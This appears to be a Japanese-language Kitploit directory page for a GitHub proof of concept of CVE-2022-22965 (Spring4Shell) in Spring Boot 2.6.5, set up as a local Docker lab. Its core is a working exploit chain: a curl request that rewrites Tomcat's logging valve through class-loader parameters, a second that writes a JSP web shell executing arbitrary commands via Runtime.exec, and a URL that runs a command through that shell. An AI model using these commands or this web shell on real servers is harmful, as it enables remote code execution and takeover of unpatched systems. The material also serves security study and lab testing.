Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SSE4-CVE-2022-22965 — CVE-2022-22965 概念実証 | Kitploit
ツール/GitHubGitHub/clemoregan/sse4-cve-2022-22965
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubclemoregan/sse4-cve-2022-22965

SSE4-CVE-2022-22965

CVE-2022-22965 概念実証

リポジトリを見る
113年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Spring Boot CVE-2022-22965

Spring Boot バージョン 2.6.5 における CVE-2022-22965 の Docker PoC

はじめに

  1. docker compose up --build を実行して、脆弱性のあるアプリケーションをビルドし起動します。
  2. 次の curl コマンドを実行して Tomcat の設定バルブを変更します。
root@kitploit:~
curl -H "Accept: text/html;" "http://localhost:8080/demo/sample?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
  1. 次の curl コマンドを実行して Web シェルを作成します。
root@kitploit:~
curl -H "Accept: text/html;" -H "code: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(String.valueOf(1337))).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } %>" "http://localhost:8080/demo/x"
  1. ブラウザを開き、http://localhost:8080/shell.jsp?1337=id にアクセスしてコマンドを実行します。
ツールをダウンロード